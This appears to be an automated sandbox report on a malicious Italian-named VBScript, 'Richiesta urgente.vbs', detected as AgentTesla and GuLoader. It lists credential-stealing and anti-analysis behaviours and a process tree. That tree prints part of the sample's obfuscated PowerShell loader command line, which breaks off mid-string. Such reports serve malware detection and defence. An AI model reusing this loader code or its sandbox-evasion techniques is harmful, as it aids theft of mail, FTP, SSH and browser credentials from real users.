Edit tour
Windows
Analysis Report
Richiesta urgente.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Uses a known web browser user agent for HTTP communication
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64
- wscript.exe (PID: 4088 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Richi esta urgen te.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - cmd.exe (PID: 1004 cmdline:
CMD.EXE /c echo C:\W indows MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4540 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 5840 cmdline:
C:\Windows \syswow64\ WindowsPow erShell\v1 .0\powersh ell.exe" " $Skolegaar dene = """ ReABedSadD i-FiTGeySj pSyeAn De- ChTHeyTepA neLaDReeOp fPriNonMii PrtSainooS cnKa Da'Ko uRisFoiUdn MygSy SySI myInsOftTr eTumok;Suu StsNyiSunB igDr TrSMi yAssDatDee PrmTi.DoRM iuManSotCo iGamDueBi. BoIAnnSotP heOprInoUd pTeSDeeOmr govStiKncT reDesFo;op pSiuPabFol VaiAfcGl E lsShtFiaBa tHviCocOt dacUnlRyaD zsSpsOr Si RChePraUdb StrGiiSidA dgPaeNodAt 1Ch In{Cr[ FjDDrlAdlS qIHemTapKo oBerVatDe( Ne`"""SowO wiHanSamBl mBa.DedSal BalIn`"""B i)Sg]KopPe uAsbFolUni HocMy PrsG rtUnaSetIn iStcSi Hae NexSktBreP orFenGe un iUnnArtMa HomCaiMbdS aiSuOTjuLg tNoOZipFoe JrnXs(SmiO rnButbr Po kPrvAbaTal MoiBe,Tiig anSatth br KAtovinTe, ZaiLunDitA d KoRRuiOv nPegSaeAtd Th,RriBanT rtDe SpUOu nPywFooHe, HoiKnnGetH a koUWidGr eRe)Co;as[ MuDTulAllR eIThmNopBl oBrrFitNe( Ud`"""SekU neserObnOm eBilHl3Up2 Te`"""He)a v]RipAruFu bOclFiiCuc Ma AssEmtS aaDrtApiFr cTu RaeStx DitKieVerM enPr JiiFa nOvtLo ArL MooPecviaA ulprSUnhCa rPoihunSvk de(OuiUnnH itSt ResDy cPuoUnrTup GriBr,WhiV enDotSt St NSasFikOve MatImnUp)E u;Fg[GuDHy lAnlFuIPem AfpLeoWirM utRa(Kh`"" "VekBieEmr AdnPueanlN l3Ek2bl`"" "Sp)Pe]Rep GeuRebPrlR eiRacSt de sBetTaaMat FiiFocOm S heFaxPitDi eUnrTanko BliSunKatK e ScSAreCa tAnCUdoMom BomSiSDitC aazatAmeRe (UniSmnExt Se CoKCuoB efAltSmaAf ,NaiAfnLat Su scSLatK aoHorHorTr yBu)sk;Kr[ LiDstlImlc uIHomEkpTa oRkrBrtSh( Pu`"""PskF eeSkrAnnOp eunlBi3Sp2 ut`"""Va)G r]GopOruPa bOvlUpiShc Su VesBetL aaIstPtiSn cEn PueBux AgtCoeunrC anUe AliMo nvetCe TrH LeeSaaSlpJ aCDyrSieDi aAftTieDr( IliGrnUdtE n ScNDoeDo cWirHioSap Be,BiiVonS itDo GaFSe lafsFnkPr, IniInnAntO s moGSirSp uFipLe)Al; Sy[brDUplA blSeIPomSu pTeoBarblt Gl(Af`"""P rkCoeXerBa nFleAflsy3 Br2Ma`"""u n)Tr]HepNa uNobColUli RecUd SrsD etThaRotKu iIscPh Gre BexFrtGeeS prMinVi Ci iFinwotDe StVFaipsrZ otThuMiaOp lStAArlUnl AgoGrcbo(D aiSanSytAf EqvEp1Sy, hoiDenOxtS t UnvMe2Be ,TriKonKot ro SkvFl3w i,FoiMonGa tFi StvMi4 Ch)Be;Tu[P aDAtlBglOp IKomPhpLao BarSptWa(M a`"""ThiJa mRemDe3Ba2 Vi.HedSolS alBa`"""Fe )Br]SepLuu EnbAflDeiH ocSk LusHy tViaantKoi PocZr NoeD rxUrtCleFa rdonBl Hei BanBrtXe h vIBlmRhmAg SkreDetEvS MatFiaRatU duAnsDuWAn iRunKedDio OpwTrPBroA nsPu(CoiUn nDitBa NeP PoaSklSkaE n,ChiRenXe tAl skRPya InzNe)Me;B i[VaDRelRh lAnIsemifp OuochrFrtD e(Ti`"""om AHyDwiVreA faPGrIPh3S n2Mi.SpDNi LPlLVu`""" Ep)Un]VepC luSsbGelRe iAfcFl drs LgtMiaErtP aiOpcna Sh eSixCytOpe GerBenSu U niStnTitAk BaISnnTri SotMaiScaG rlPaiejzCo eAnAKactal Be(PoiPunH ntRu TeCTi oAclBa,Aai SynMetMi L eUPinDeaPr ,AfiMenRet As FaFMelF roTepOrpOl 2na0Ma1Sn) Mi;In[DeDS alPalslICh mNopEroPhr EutSc(Pa`" ""EngSvdTa iOl3Re2so` """Ud)Qu]F ipHyuSkbAd lMaiGucGi OcsUdtlaaM otReiFrcSk